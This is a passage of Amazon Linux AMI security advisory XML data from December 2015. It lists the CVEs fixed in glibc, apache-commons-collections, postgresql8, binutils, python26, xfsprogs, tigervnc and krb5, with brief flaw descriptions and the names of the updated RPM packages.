href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4883" title="" id="CVE-2015-4883" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4893" title="" id="CVE-2015-4893" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4903" title="" id="CVE-2015-4903" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4911" title="" id="CVE-2015-4911" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:2086.html" title="" id="RHSA-2015:2086" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.6.0-openjdk" version="1.6.0.37" release="1.13.9.4.72.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-1.6.0.37-1.13.9.4.72.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.37" release="1.13.9.4.72.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.37-1.13.9.4.72.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.37" release="1.13.9.4.72.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.37-1.13.9.4.72.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.37" release="1.13.9.4.72.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.37-1.13.9.4.72.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.37" release="1.13.9.4.72.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.37-1.13.9.4.72.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.37" release="1.13.9.4.72.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.37-1.13.9.4.72.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.37" release="1.13.9.4.72.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.37-1.13.9.4.72.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.37" release="1.13.9.4.72.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.37-1.13.9.4.72.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.37" release="1.13.9.4.72.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.37-1.13.9.4.72.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.37" release="1.13.9.4.72.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-1.6.0.37-1.13.9.4.72.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.37" release="1.13.9.4.72.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.37-1.13.9.4.72.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.37" release="1.13.9.4.72.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.37-1.13.9.4.72.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-617</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-617: important priority package update for glibc</title><issued date="2015-12-14 10:00:00" /><updated date="2015-12-13 14:19:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-5277:
It was discovered that the nss_files backend for the Name Service Switch in glibc would return incorrect data to applications or corrupt the heap (depending on adjacent heap contents). A local attacker could potentially use this flaw to execute arbitrary code on the system.
1262914:
CVE-2015-5277 glibc: data corruption while reading the NSS files database
CVE-2015-1781:
A buffer overflow flaw was found in the way glibc&#039;s gethostbyname_r() and other related functions computed the size of a buffer when passed a misaligned buffer as input. An attacker able to make an application call any of these functions with a misaligned buffer could use this flaw to crash the application or, potentially, execute arbitrary code with the permissions of the user running the application.
1199525:
CVE-2015-1781 glibc: buffer overflow in gethostbyname_r() and related functions with misaligned buffer
CVE-2015-1473:
A stack overflow flaw was found in glibc&#039;s swscanf() function. An attacker able to make an application call the swscanf() function could use this flaw to crash that application or, potentially, execute arbitrary code with the permissions of the user running the application.
1209105:
CVE-2015-1473 glibc: Stack-overflow in glibc swscanf
CVE-2015-1472:
A heap-based buffer overflow flaw was found in glibc&#039;s swscanf() function. An attacker able to make an application call the swscanf() function could use this flaw to crash that application or, potentially, execute arbitrary code with the permissions of the user running the application.
1188235:
CVE-2015-1472 glibc: heap buffer overflow in glibc swscanf
CVE-2013-7423:
It was discovered that, under certain circumstances, glibc&#039;s getaddrinfo() function would send DNS queries to random file descriptors. An attacker could potentially use this flaw to send DNS queries to unintended recipients, resulting in information disclosure or data loss due to the application encountering corrupted data.
1187109:
CVE-2013-7423 glibc: getaddrinfo() writes DNS queries to random file descriptors under high load
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7423" title="" id="CVE-2013-7423" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1472" title="" id="CVE-2015-1472" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1473" title="" id="CVE-2015-1473" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1781" title="" id="CVE-2015-1781" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5277" title="" id="CVE-2015-5277" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="glibc-common" version="2.17" release="106.163.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-common-2.17-106.163.amzn1.x86_64.rpm</filename></package><package name="glibc-static" version="2.17" release="106.163.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-static-2.17-106.163.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="106.163.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-2.17-106.163.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="106.163.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-common-2.17-106.163.amzn1.x86_64.rpm</filename></package><package name="glibc-devel" version="2.17" release="106.163.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-devel-2.17-106.163.amzn1.x86_64.rpm</filename></package><package name="glibc-headers" version="2.17" release="106.163.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-headers-2.17-106.163.amzn1.x86_64.rpm</filename></package><package name="glibc" version="2.17" release="106.163.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-2.17-106.163.amzn1.x86_64.rpm</filename></package><package name="glibc-utils" version="2.17" release="106.163.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-utils-2.17-106.163.amzn1.x86_64.rpm</filename></package><package name="nscd" version="2.17" release="106.163.amzn1" epoch="0" arch="x86_64"><filename>Packages/nscd-2.17-106.163.amzn1.x86_64.rpm</filename></package><package name="nscd" version="2.17" release="106.163.amzn1" epoch="0" arch="i686"><filename>Packages/nscd-2.17-106.163.amzn1.i686.rpm</filename></package><package name="glibc-common" version="2.17" release="106.163.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-common-2.17-106.163.amzn1.i686.rpm</filename></package><package name="glibc-devel" version="2.17" release="106.163.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-devel-2.17-106.163.amzn1.i686.rpm</filename></package><package name="glibc" version="2.17" release="106.163.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-2.17-106.163.amzn1.i686.rpm</filename></package><package name="glibc-utils" version="2.17" release="106.163.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-utils-2.17-106.163.amzn1.i686.rpm</filename></package><package name="glibc-static" version="2.17" release="106.163.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-static-2.17-106.163.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="106.163.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-2.17-106.163.amzn1.i686.rpm</filename></package><package name="glibc-headers" version="2.17" release="106.163.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-headers-2.17-106.163.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="106.163.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-common-2.17-106.163.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-618</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-618: important priority package update for apache-commons-collections</title><issued date="2015-12-14 10:00:00" /><updated date="2015-12-13 14:19:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-7501:
It was found that the Apache commons-collections library permitted code execution when deserializing objects involving a specially constructed chain of classes. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the commons-collections library.
1279330:
CVE-2015-7501 apache-commons-collections: InvokerTransformer code execution during deserialisation
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7501" title="" id="CVE-2015-7501" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="apache-commons-collections-testframework-javadoc" version="3.2.1" release="11.9.amzn1" epoch="0" arch="noarch"><filename>Packages/apache-commons-collections-testframework-javadoc-3.2.1-11.9.amzn1.noarch.rpm</filename></package><package name="apache-commons-collections" version="3.2.1" release="11.9.amzn1" epoch="0" arch="noarch"><filename>Packages/apache-commons-collections-3.2.1-11.9.amzn1.noarch.rpm</filename></package><package name="apache-commons-collections-javadoc" version="3.2.1" release="11.9.amzn1" epoch="0" arch="noarch"><filename>Packages/apache-commons-collections-javadoc-3.2.1-11.9.amzn1.noarch.rpm</filename></package><package name="apache-commons-collections-testframework" version="3.2.1" release="11.9.amzn1" epoch="0" arch="noarch"><filename>Packages/apache-commons-collections-testframework-3.2.1-11.9.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-619</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-619: medium priority package update for postgresql8</title><issued date="2015-12-14 10:00:00" /><updated date="2015-12-13 14:20:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-5288:
A memory leak error was discovered in the crypt() function of the pgCrypto extension. An authenticated attacker could possibly use this flaw to disclose a limited amount of the server memory.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5288" title="" id="CVE-2015-5288" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:2081.html" title="" id="RHSA-2015:2081" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql8" version="8.4.20" release="4.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-8.4.20-4.51.amzn1.x86_64.rpm</filename></package><package name="postgresql8-docs" version="8.4.20" release="4.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-docs-8.4.20-4.51.amzn1.x86_64.rpm</filename></package><package name="postgresql8-libs" version="8.4.20" release="4.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-libs-8.4.20-4.51.amzn1.x86_64.rpm</filename></package><package name="postgresql8-devel" version="8.4.20" release="4.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-devel-8.4.20-4.51.amzn1.x86_64.rpm</filename></package><package name="postgresql8-test" version="8.4.20" release="4.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-test-8.4.20-4.51.amzn1.x86_64.rpm</filename></package><package name="postgresql8-pltcl" version="8.4.20" release="4.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-pltcl-8.4.20-4.51.amzn1.x86_64.rpm</filename></package><package name="postgresql8-contrib" version="8.4.20" release="4.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-contrib-8.4.20-4.51.amzn1.x86_64.rpm</filename></package><package name="postgresql8-server" version="8.4.20" release="4.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-server-8.4.20-4.51.amzn1.x86_64.rpm</filename></package><package name="postgresql8-plpython" version="8.4.20" release="4.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-plpython-8.4.20-4.51.amzn1.x86_64.rpm</filename></package><package name="postgresql8-debuginfo" version="8.4.20" release="4.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-debuginfo-8.4.20-4.51.amzn1.x86_64.rpm</filename></package><package name="postgresql8-plperl" version="8.4.20" release="4.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-plperl-8.4.20-4.51.amzn1.x86_64.rpm</filename></package><package name="postgresql8-plperl" version="8.4.20" release="4.51.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-plperl-8.4.20-4.51.amzn1.i686.rpm</filename></package><package name="postgresql8-test" version="8.4.20" release="4.51.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-test-8.4.20-4.51.amzn1.i686.rpm</filename></package><package name="postgresql8-plpython" version="8.4.20" release="4.51.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-plpython-8.4.20-4.51.amzn1.i686.rpm</filename></package><package name="postgresql8" version="8.4.20" release="4.51.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-8.4.20-4.51.amzn1.i686.rpm</filename></package><package name="postgresql8-libs" version="8.4.20" release="4.51.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-libs-8.4.20-4.51.amzn1.i686.rpm</filename></package><package name="postgresql8-devel" version="8.4.20" release="4.51.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-devel-8.4.20-4.51.amzn1.i686.rpm</filename></package><package name="postgresql8-debuginfo" version="8.4.20" release="4.51.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-debuginfo-8.4.20-4.51.amzn1.i686.rpm</filename></package><package name="postgresql8-contrib" version="8.4.20" release="4.51.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-contrib-8.4.20-4.51.amzn1.i686.rpm</filename></package><package name="postgresql8-server" version="8.4.20" release="4.51.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-server-8.4.20-4.51.amzn1.i686.rpm</filename></package><package name="postgresql8-docs" version="8.4.20" release="4.51.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-docs-8.4.20-4.51.amzn1.i686.rpm</filename></package><package name="postgresql8-pltcl" version="8.4.20" release="4.51.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-pltcl-8.4.20-4.51.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-620</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-620: medium priority package update for binutils</title><issued date="2015-12-14 10:00:00" /><updated date="2015-12-13 14:21:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-8738:
A heap-based buffer overflow flaw was found in the way certain binutils utilities processed archive files. If a user were tricked into processing a specially crafted archive file, it could cause the utility used to process that archive to crash or, potentially, execute arbitrary code with the privileges of the user running that utility.
1162666:
CVE-2014-8738 binutils: out of bounds memory write
CVE-2014-8737:
A directory traversal flaw was found in the strip and objcopy utilities. A specially crafted file could cause strip or objdump to overwrite an arbitrary file writable by the user running either of these utilities.
1162655:
CVE-2014-8737 binutils: directory traversal vulnerability
CVE-2014-8504:
A stack-based buffer overflow flaw was found in the SREC parser of the libbfd library. A specially crafted file could cause an application using the libbfd library to crash or, potentially, execute arbitrary code with the privileges of the user running that application.
1162621:
CVE-2014-8504 binutils: stack overflow in the SREC parser
CVE-2014-8503:
A stack-based buffer overflow flaw was found in the way objdump processed IHEX files. A specially crafted IHEX file could cause objdump to crash or, potentially, execute arbitrary code with the privileges of the user running objdump.
1162607:
CVE-2014-8503 binutils: stack overflow in objdump when parsing specially crafted ihex file
CVE-2014-8502:
It was found that the fix for the CVE-2014-8485 issue was incomplete: a heap-based buffer overflow in the objdump utility could cause it to crash or, potentially, execute arbitrary code with the privileges of the user running objdump when processing specially crafted files.
1162594:
CVE-2014-8502 binutils: heap overflow in objdump when parsing a crafted ELF/PE binary file (incomplete fix for CVE-2014-8485)
CVE-2014-8501:
A stack-based buffer overflow flaw was found in the way various binutils utilities processed certain files. If a user were tricked into processing a specially crafted file, it could cause the utility used to process that file to crash or, potentially, execute arbitrary code with the privileges of the user running that utility.
1162570:
CVE-2014-8501 binutils: out-of-bounds write when parsing specially crafted PE executable
CVE-2014-8485:
A buffer overflow flaw was found in the way various binutils utilities processed certain files. If a user were tricked into processing a specially crafted file, it could cause the utility used to process that file to crash or, potentially, execute arbitrary code with the privileges of the user running that utility.
1157276:
CVE-2014-8485 binutils: lack of range checking leading to controlled write in _bfd_elf_setup_sections()
CVE-2014-8484:
An integer overflow flaw was found in the way the strings utility processed certain files. If a user were tricked into running the strings utility on a specially crafted file, it could cause the strings executable to crash.
1156272:
CVE-2014-8484 binutils: invalid read flaw in libbfd
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8484" title="" id="CVE-2014-8484" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8485" title="" id="CVE-2014-8485" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8501" title="" id="CVE-2014-8501" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8502" title="" id="CVE-2014-8502" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8503" title="" id="CVE-2014-8503" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8504" title="" id="CVE-2014-8504" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8737" title="" id="CVE-2014-8737" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8738" title="" id="CVE-2014-8738" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="binutils-debuginfo" version="2.23.52.0.1" release="55.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/binutils-debuginfo-2.23.52.0.1-55.65.amzn1.x86_64.rpm</filename></package><package name="binutils-devel" version="2.23.52.0.1" release="55.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/binutils-devel-2.23.52.0.1-55.65.amzn1.x86_64.rpm</filename></package><package name="binutils" version="2.23.52.0.1" release="55.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/binutils-2.23.52.0.1-55.65.amzn1.x86_64.rpm</filename></package><package name="binutils-devel" version="2.23.52.0.1" release="55.65.amzn1" epoch="0" arch="i686"><filename>Packages/binutils-devel-2.23.52.0.1-55.65.amzn1.i686.rpm</filename></package><package name="binutils-debuginfo" version="2.23.52.0.1" release="55.65.amzn1" epoch="0" arch="i686"><filename>Packages/binutils-debuginfo-2.23.52.0.1-55.65.amzn1.i686.rpm</filename></package><package name="binutils" version="2.23.52.0.1" release="55.65.amzn1" epoch="0" arch="i686"><filename>Packages/binutils-2.23.52.0.1-55.65.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-621</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-621: medium priority package update for python26</title><issued date="2015-12-14 10:00:00" /><updated date="2015-12-13 14:22:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-7185:
Integer overflow in bufferobject.c in Python before 2.7.8 allows context-dependent attackers to obtain sensitive information from process memory via a large size and offset in a "buffer" function.
An integer overflow flaw was found in the way the buffer() function handled its offset and size arguments. An attacker able to control those arguments could use this flaw to disclose portions of the application memory or cause it to crash.
1146026:
CVE-2014-7185 python: buffer() integer overflow leading to out of bounds read
CVE-2014-4650:
It was discovered that the CGIHTTPServer module incorrectly handled URL encoded paths. A remote attacker could use this flaw to execute scripts outside of the cgi-bin directory, or disclose source of scripts in the cgi-bin directory.
1113527:
CVE-2014-4650 python: CGIHTTPServer module does not properly handle URL-encoded path separators in URLs
CVE-2013-1752:
It was discovered that multiple Python standard library modules implementing network protocols (such as httplib or smtplib) failed to restrict sizes of server responses. A malicious server could cause a client using one of the affected modules to consume an excessive amount of memory.
1046174:
CVE-2013-1752 python: multiple unbound readline() DoS flaws in python stdlib
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1752" title="" id="CVE-2013-1752" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4650" title="" id="CVE-2014-4650" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7185" title="" id="CVE-2014-7185" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python26-devel" version="2.6.9" release="2.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-devel-2.6.9-2.83.amzn1.x86_64.rpm</filename></package><package name="python26-libs" version="2.6.9" release="2.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-libs-2.6.9-2.83.amzn1.x86_64.rpm</filename></package><package name="python26-tools" version="2.6.9" release="2.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-tools-2.6.9-2.83.amzn1.x86_64.rpm</filename></package><package name="python26" version="2.6.9" release="2.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-2.6.9-2.83.amzn1.x86_64.rpm</filename></package><package name="python26-test" version="2.6.9" release="2.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-test-2.6.9-2.83.amzn1.x86_64.rpm</filename></package><package name="python26-debuginfo" version="2.6.9" release="2.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-debuginfo-2.6.9-2.83.amzn1.x86_64.rpm</filename></package><package name="python26-test" version="2.6.9" release="2.83.amzn1" epoch="0" arch="i686"><filename>Packages/python26-test-2.6.9-2.83.amzn1.i686.rpm</filename></package><package name="python26-tools" version="2.6.9" release="2.83.amzn1" epoch="0" arch="i686"><filename>Packages/python26-tools-2.6.9-2.83.amzn1.i686.rpm</filename></package><package name="python26-debuginfo" version="2.6.9" release="2.83.amzn1" epoch="0" arch="i686"><filename>Packages/python26-debuginfo-2.6.9-2.83.amzn1.i686.rpm</filename></package><package name="python26-libs" version="2.6.9" release="2.83.amzn1" epoch="0" arch="i686"><filename>Packages/python26-libs-2.6.9-2.83.amzn1.i686.rpm</filename></package><package name="python26-devel" version="2.6.9" release="2.83.amzn1" epoch="0" arch="i686"><filename>Packages/python26-devel-2.6.9-2.83.amzn1.i686.rpm</filename></package><package name="python26" version="2.6.9" release="2.83.amzn1" epoch="0" arch="i686"><filename>Packages/python26-2.6.9-2.83.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-622</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-622: low priority package update for xfsprogs</title><issued date="2015-12-14 10:00:00" /><updated date="2015-12-13 14:22:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2012-2150:
It was discovered that the xfs_metadump tool of the xfsprogs suite did not fully adhere to the standards of obfuscation described in its man page. In case a user with the necessary privileges used xfs_metadump and relied on the advertised obfuscation, the generated data could contain unexpected traces of potentially sensitive information.
817696:
CVE-2012-2150 xfsprogs: xfs_metadump information disclosure flaw
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2150" title="" id="CVE-2012-2150" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="xfsprogs-debuginfo" version="3.2.2" release="2.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/xfsprogs-debuginfo-3.2.2-2.20.amzn1.x86_64.rpm</filename></package><package name="xfsprogs" version="3.2.2" release="2.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/xfsprogs-3.2.2-2.20.amzn1.x86_64.rpm</filename></package><package name="xfsprogs-devel" version="3.2.2" release="2.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/xfsprogs-devel-3.2.2-2.20.amzn1.x86_64.rpm</filename></package><package name="xfsprogs" version="3.2.2" release="2.20.amzn1" epoch="0" arch="i686"><filename>Packages/xfsprogs-3.2.2-2.20.amzn1.i686.rpm</filename></package><package name="xfsprogs-devel" version="3.2.2" release="2.20.amzn1" epoch="0" arch="i686"><filename>Packages/xfsprogs-devel-3.2.2-2.20.amzn1.i686.rpm</filename></package><package name="xfsprogs-debuginfo" version="3.2.2" release="2.20.amzn1" epoch="0" arch="i686"><filename>Packages/xfsprogs-debuginfo-3.2.2-2.20.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-623</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-623: medium priority package update for tigervnc</title><issued date="2015-12-14 10:00:00" /><updated date="2015-12-13 14:23:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-8241:
A NULL pointer dereference flaw was found in TigerVNC&#039;s XRegion. A malicious VNC server could use this flaw to cause a client to crash.
1151312:
CVE-2014-8241 tigervnc: NULL pointer dereference flaw in XRegion
CVE-2014-8240:
An integer overflow flaw, leading to a heap-based buffer overflow, was found in the way TigerVNC handled screen sizes. A malicious VNC server could use this flaw to cause a client to crash or, potentially, execute arbitrary code on the client.
1151307:
CVE-2014-8240 tigervnc: integer overflow flaw, leading to a heap-based buffer overflow in screen size handling
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8240" title="" id="CVE-2014-8240" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8241" title="" id="CVE-2014-8241" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tigervnc-server-module" version="1.3.1" release="3.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/tigervnc-server-module-1.3.1-3.31.amzn1.x86_64.rpm</filename></package><package name="tigervnc-server" version="1.3.1" release="3.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/tigervnc-server-1.3.1-3.31.amzn1.x86_64.rpm</filename></package><package name="tigervnc-debuginfo" version="1.3.1" release="3.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/tigervnc-debuginfo-1.3.1-3.31.amzn1.x86_64.rpm</filename></package><package name="tigervnc" version="1.3.1" release="3.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/tigervnc-1.3.1-3.31.amzn1.x86_64.rpm</filename></package><package name="tigervnc-debuginfo" version="1.3.1" release="3.31.amzn1" epoch="0" arch="i686"><filename>Packages/tigervnc-debuginfo-1.3.1-3.31.amzn1.i686.rpm</filename></package><package name="tigervnc-server" version="1.3.1" release="3.31.amzn1" epoch="0" arch="i686"><filename>Packages/tigervnc-server-1.3.1-3.31.amzn1.i686.rpm</filename></package><package name="tigervnc-server-module" version="1.3.1" release="3.31.amzn1" epoch="0" arch="i686"><filename>Packages/tigervnc-server-module-1.3.1-3.31.amzn1.i686.rpm</filename></package><package name="tigervnc" version="1.3.1" release="3.31.amzn1" epoch="0" arch="i686"><filename>Packages/tigervnc-1.3.1-3.31.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-624</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-624: medium priority package update for krb5</title><issued date="2015-12-14 10:00:00" /><updated date="2015-12-13 14:23:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-2694:
A flaw was found in the OTP kdcpreauth module of MIT Kerberos. A remote attacker could use this flaw to bypass the requires_preauth flag on a client principal and obtain a ciphertext encrypted in the principal&#039;s long-term key. This ciphertext could be used to conduct an off-line dictionary attack against the user&#039;s password.
1216133:
CVE-2015-2694 krb5: issues in OTP and PKINIT kdcpreauth modules leading to requires_preauth bypass
CVE-2014-5355:
It was found that the krb5_read_message() function of MIT Kerberos did not correctly sanitize input, and could create invalid krb5_data objects. A remote, unauthenticated attacker could use this flaw to crash a Kerberos child process via a specially crafted request.
1193939:
CVE-2014-5355 krb5: unauthenticated denial of service in recvauth_common() and others
